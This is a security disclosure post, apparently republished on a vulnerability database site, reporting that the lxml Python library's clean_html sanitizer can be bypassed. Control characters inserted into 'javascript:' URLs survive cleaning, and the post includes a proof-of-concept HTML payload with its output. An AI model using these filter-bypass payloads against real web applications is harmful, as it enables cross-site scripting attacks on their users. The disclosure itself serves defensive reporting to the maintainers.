`Hi, all
I've accidentally found vulnerability in clean_html function of lxml python
library. User can break schema of url with nonprinted chars (\x01-\x08).
Seems like all versions including the latest 3.3.4 are vulnerable. Here is
PoC.
from lxml.html.clean import clean_html
html = '''\
<html>
<body>
<a href="javascript:alert(0)">
aaa</a>
<a href="javas\x01cript:alert(1)">bbb</a>
<a href="javas\x02cript:alert(1)">bbb</a>
<a href="javas\x03cript:alert(1)">bbb</a>
<a href="javas\x04cript:alert(1)">bbb</a>
<a href="javas\x05cript:alert(1)">bbb</a>
<a href="javas\x06cript:alert(1)">bbb</a>
<a href="javas\x07cript:alert(1)">bbb</a>
<a href="javas\x08cript:alert(1)">bbb</a>
<a href="javas\x09cript:alert(1)">bbb</a>
</body>
</html>'''
print clean_html(html)
Output:
<div>
<body>
<a href="">aaa</a>
<a href="javascript:alert(1)">
bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="">bbb</a>
</body>
</div>
I've emailed lxml-guys. Hope they'll fix it soon.
----
ksimka (@m_ksimka)
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation